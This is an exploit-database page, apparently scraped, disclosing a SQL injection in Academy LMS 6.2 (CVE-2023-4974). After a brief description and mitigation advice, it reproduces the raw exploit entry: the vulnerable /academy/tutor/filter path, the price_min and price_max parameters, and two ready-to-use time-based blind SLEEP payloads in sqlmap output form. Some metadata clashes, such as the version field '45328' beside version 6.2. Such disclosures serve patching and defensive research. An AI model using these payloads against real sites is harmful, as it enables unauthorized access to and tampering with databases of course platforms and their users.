header-logo
Suggest Exploit
vendor:
Academy LMS
by:
CraCkEr
8.1
CVSS
CRITICAL
SQL Injection
89, 74, 707
CWE
Product Name: Academy LMS
Affected Version From: 45328
Affected Version To: 45328
Patch Exists: NO
Related CWE: CVE-2023-4974
CPE: a:creativeitem:academy_lms:6.2
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro
2023

Academy LMS 6.2 – SQL Injection

SQL injection in Academy LMS 6.2 allows unauthorized access to sensitive data, data modification, and application crash. This can result in financial losses and harm a company's reputation. An attacker can exploit 'price_min' and 'price_max' parameters in the /academy/tutor/filter path to perform SQL injection attacks.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented. Regular security audits and patch management are essential.
Source

Exploit-DB raw data:

# Exploit Title: Academy LMS 6.2 - SQL Injection
# Exploit Author: CraCkEr
# Date: 29/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4974
# CWE: CWE-89 / CWE-74 / CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /academy/tutor/filter

GET parameter 'price_min' is vulnerable to SQL Injection
GET parameter 'price_max' is vulnerable to SQL Injection

https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0

---
Parameter: price_min (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0

Parameter: price_max (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0
---


[-] Done